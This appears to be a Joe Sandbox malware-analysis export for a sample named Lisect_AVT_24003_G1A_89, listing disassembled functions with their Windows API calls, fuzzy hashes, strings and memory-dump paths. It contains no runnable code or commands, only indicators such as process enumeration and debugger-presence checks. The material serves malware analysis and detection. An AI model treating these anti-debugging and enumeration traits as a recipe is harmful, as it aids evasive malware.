Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CopyFileProcess32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 3445113079-0
Opcode ID: c503fd60b840f920cdda555973546c84317f5b911cba2896da3657d2b602fc1e
Instruction ID: 287753f846746f3d7191f2261d3978641ea4adef81b12896657c17cce8b285f4
Opcode Fuzzy Hash: c503fd60b840f920cdda555973546c84317f5b911cba2896da3657d2b602fc1e
Instruction Fuzzy Hash: 00323731E0020A8FDF08DF68DD95BEEBBB1EF55314F24425CE845AB281D735AA45DBA0

Function 010AE0A0 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 010AE1A8
IsValidCodePage.KERNEL32(?), ref: 010AE1E6
IsValidLocale.KERNEL32(?,00000001), ref: 010AE1F9
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 010AE241
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 010AE25C

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: d069feaddb42457ec7347d23ab850e7fa883fa5b8ebe71535427d85606a8f21e
Instruction ID: 4f75176efde3fa276a65ab4695cc96c852ea2592832df436dac37843e585638f
Opcode Fuzzy Hash: d069feaddb42457ec7347d23ab850e7fa883fa5b8ebe71535427d85606a8f21e
Instruction Fuzzy Hash: F5514F71A00216AFEF60DBE9CC40AEE77F8BF18700F844569E695EB190E770A9448B61

Function 00FBA400 Relevance: 7.6, APIs: 5, Instructions: 118memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?), ref: 00FBA478
GetProcAddress.KERNEL32(00000000,?), ref: 00FBA483
GetProcessHeap.KERNEL32(?,?), ref: 00FBA490
RtlAllocateHeap.NTDLL(00000000,00000000,00010000), ref: 00FBA4A6
RtlAllocateHeap.NTDLL(?,00000000,00010000), ref: 00FBA4DC

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: Heap$Allocate$AddressHandleModuleProcProcess
String ID:
API String ID: 3330366720-0
Opcode ID: 699d6cd2b7d54bacb5f651d80f573f46a2d690d71b62313c003cefaaaf5c93ef
Instruction ID: 82548c7bd1d31a82e6f7c9527a50d1d0bb22c6c8abd2d6f982654a1b397f4497
Opcode Fuzzy Hash: 699d6cd2b7d54bacb5f651d80f573f46a2d690d71b62313c003cefaaaf5c93ef
Instruction Fuzzy Hash: 4C411831E00349ABDB20CFEDDC88BDEBBB8EF49314F1041A9EA48E7241D6755944CBA5

Function 010AD72B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1

GetACP.KERNEL32(?,?,?,?,?,?,010A0A83,?,?,?,?,?,-00000050,?,?,?), ref: 010AD7EA
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,010A0A83,?,?,?,?,?,-00000050,?,?), ref: 010AD821
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 010AD984

Strings

utf8, xrefs: 010AD8F3

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: c7798602998078358ed359218afa84acff8dd0189433d66137456876b9ae6ec5
Instruction ID: dba5ade4c47f9c1be4a42df1fd7a0b77be4aa8c219bdc0ac426bc130da98debc
Opcode Fuzzy Hash: c7798602998078358ed359218afa84acff8dd0189433d66137456876b9ae6ec5
Instruction Fuzzy Hash: 0F71F771600207AAE725ABF8CC45BEA77E8EF04700F84056AE6C5DB981EB74E940C760

Function 010206F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

type must be number, but is , xrefs: 010208B1
/Kim, xrefs: 01020919
/Kim, xrefs: 01020932
type must be string, but is , xrefs: 01020754

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID: /Kim$/Kim$type must be number, but is $type must be string, but is
API String ID: 0-1144537432
Opcode ID: 7e103591d162a2bbf9b435da3d6c8b71be6df9c7b4bb9153d7b8b47afbbf9314
Instruction ID: 7597c7086c72ae3863c770791a109bee3c24ce222827560cc5acfb11ad3672e5
Opcode Fuzzy Hash: 7e103591d162a2bbf9b435da3d6c8b71be6df9c7b4bb9153d7b8b47afbbf9314
Instruction Fuzzy Hash: 99910372F002199FCB08CFACD8917DAB7E9EB88310F1482AEE94997395D6755D05CB80

Function 010ADB48 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010ADB9C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010ADBE6
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010ADCAC

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 4ef1a40aa4b1304e88e9e2d865e032d1927a8e3fa1a607bd0b0166c075879653
Instruction ID: 7a7b63cd897a12ffdfb9ead8c3400a8356f6fbab48e97994d9cc2244d089e5b2
Opcode Fuzzy Hash: 4ef1a40aa4b1304e88e9e2d865e032d1927a8e3fa1a607bd0b0166c075879653
Instruction Fuzzy Hash: 3561C3B151020B9FEB69AFE8CD81BBA77F8EF14300F9041B9E985C6985E774D980CB50

Function 01092014 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0109210C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01092116
UnhandledExceptionFilter.KERNEL32(?), ref: 01092123

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cf12d551bd5e97db83732af10f61ce2d6e5024a0fb07e03d43b02fe71205076b
Instruction ID: 06a2a469cb6f964dfff1dcb2b7b1e84b86c34e3cb45af565cdfba9f767517c02
Opcode Fuzzy Hash: cf12d551bd5e97db83732af10f61ce2d6e5024a0fb07e03d43b02fe71205076b
Instruction Fuzzy Hash: 7731D47490121DABCB21EF68D9887DCBBB8BF18310F5042DAE55CA72A0E7749B818F44

Function 7ECA0000 Relevance: 3.3, Strings: 2, Instructions: 829COMMON

Download Yara Rule

Strings

8FH9, xrefs: 7ECA0AE4
ePS^, xrefs: 7ECA00E7

Memory Dump Source

Source File: 00000000.00000002.4461588188.000000007ECA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ECA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7eca0000_Lisect_AVT_24003_G1A_89.jbxd

Similarity

API ID:
String ID: 8FH9$ePS^
API String ID: 0-2177040980
Opcode ID: feb7b235874c29357912c28811fb845d837b5554871f4c54ac87b5b76058b65e
Instruction ID: d65ce1ba04b66dad8eb1a5bd2ab63ebcb8b65dce4f49e96ed3b8151cfbba7a08
Opcode Fuzzy Hash: feb7b235874c29357912c28811fb845d837b5554871f4c54ac87b5b76058b65e
Instruction Fuzzy Hash: 274299F7E003012BF3058A29DCC2A9B769BEBC4368F29853CEA4D677C5E1B59D118791

Function 0108CCDC Relevance: 3.0, APIs: 2, Instructions: 15timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0108C6EA,?,?,?,?,00FC4A9B,?,00FCF03C), ref: 0108CCF5
GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,0108C6EA,?,?,?,?,00FC4A9B,?,00FCF03C), ref: 0108CCF9

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$Precise
String ID:
API String ID: 743729956-0
Opcode ID: a3b8c042f88e5f5dd22d16cc379320846976ede39f03e8523c5a0004c3fd8ab8
Instruction ID: 365ff3a5a54d247cbbdcc6c0a54a004740513a28f46689c70673702f5fbe52ce
Opcode Fuzzy Hash: a3b8c042f88e5f5dd22d16cc379320846976ede39f03e8523c5a0004c3fd8ab8
Instruction Fuzzy Hash: 9ED0A93250902CA7AB212BA9B9044DC7BA9EA08A10308801AFAC567104CAA619004BE0

Function 7ECA0B23 Relevance: 2.8, Strings: 2, Instructions: 294COMMON

Download Yara Rule

Strings

G<\y, xrefs: 7ECA0C00
8FH9, xrefs: 7ECA0AE4

Memory Dump Source

Source File: 00000000.00000002.4461588188.000000007ECA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ECA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7eca0000_Lisect_AVT_24003_G1A_89.jbxd

Similarity

API ID:
String ID: 8FH9$G<\y
API String ID: 0-3903323649
Opcode ID: 46c4aa28b2b6e9893cf615e23a384afeb98959246bed738772adf2a5737d87a3
Instruction ID: 7ee1c94c6a6b694d49a51c6916c795af29a08825efe5bc334390616c5d36d2b5
Opcode Fuzzy Hash: 46c4aa28b2b6e9893cf615e23a384afeb98959246bed738772adf2a5737d87a3
Instruction Fuzzy Hash: B19188BBE017151BF3048A68EC96657769BABC4368F6B863CDE0E633C5D5B89D1043C2

Function 00FC4AB0 Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,00000001,00000000), ref: 00FC4C63

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: f5d099542c914362ff3cac1c12f7aa4eb85546ff5bdc0f48b250229156567b33
Instruction ID: 76b0b386c3b07f62285402b14c4a1c53ac9c888f680f818ae71270607039a1a6
Opcode Fuzzy Hash: f5d099542c914362ff3cac1c12f7aa4eb85546ff5bdc0f48b250229156567b33
Instruction Fuzzy Hash: 6F51A171D0020A9FCB18DF68C951BEEBBB4EF88710F108259E855B7350D774AE448BA4

Function 010ADD9B Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010ADDEF

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 21af563b6dfa7ac5bdf72088d35f953a9af85aaf1cff09757fa4f3dbb8331ef6
Instruction ID: cf27d51caee8017b3158f53fabf5a99c640c444b263284c9d74ab206cc4c0fda
Opcode Fuzzy Hash: 21af563b6dfa7ac5bdf72088d35f953a9af85aaf1cff09757fa4f3dbb8331ef6
Instruction Fuzzy Hash: 6521C272600206ABDB28EFE8DD41ABB37E8EF64754B4040BAEA85C7541EB35E940C750

Function 010ADA22 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1

EnumSystemLocalesW.KERNEL32(010ADB48,00000001,00000000,?,?,?,010AE17C,?), ref: 010ADA94

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9e4445c000a112260a239de3497b938114a4d59ee4aaa6f789b8d567eccc647e
Instruction ID: bbb3233fd6a69a3394cd45c0a4374feb9e396e43af579c8c08720d2c96381a66
Opcode Fuzzy Hash: 9e4445c000a112260a239de3497b938114a4d59ee4aaa6f789b8d567eccc647e
Instruction Fuzzy Hash: 8F11293B2047019FDB189FB9C8A05BAB791FF84319B54442CE9C74BB40D3716542C740

Function 010ADFCA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,010ADD64,00000000,00000000,?), ref: 010ADFF6

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 7bb20ca48ebed42ba3c9504b541af6599806600d5586f295179f0ff96be4a3b7
Instruction ID: ab66cd9dc5d1667ac6d45ddd92c28f3bdf19579d429fbc33ae0cfda807b4ce7e
Opcode Fuzzy Hash: 7bb20ca48ebed42ba3c9504b541af6599806600d5586f295179f0ff96be4a3b7
Instruction Fuzzy Hash: CC014E32640113ABDF285BA8CC45EFB3794DB40254F444569FDC2AB180DA30FDC1C690

Function 010AD930 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 010AD984

Strings

utf8, xrefs: 010AD8F3

Memory Dump Source

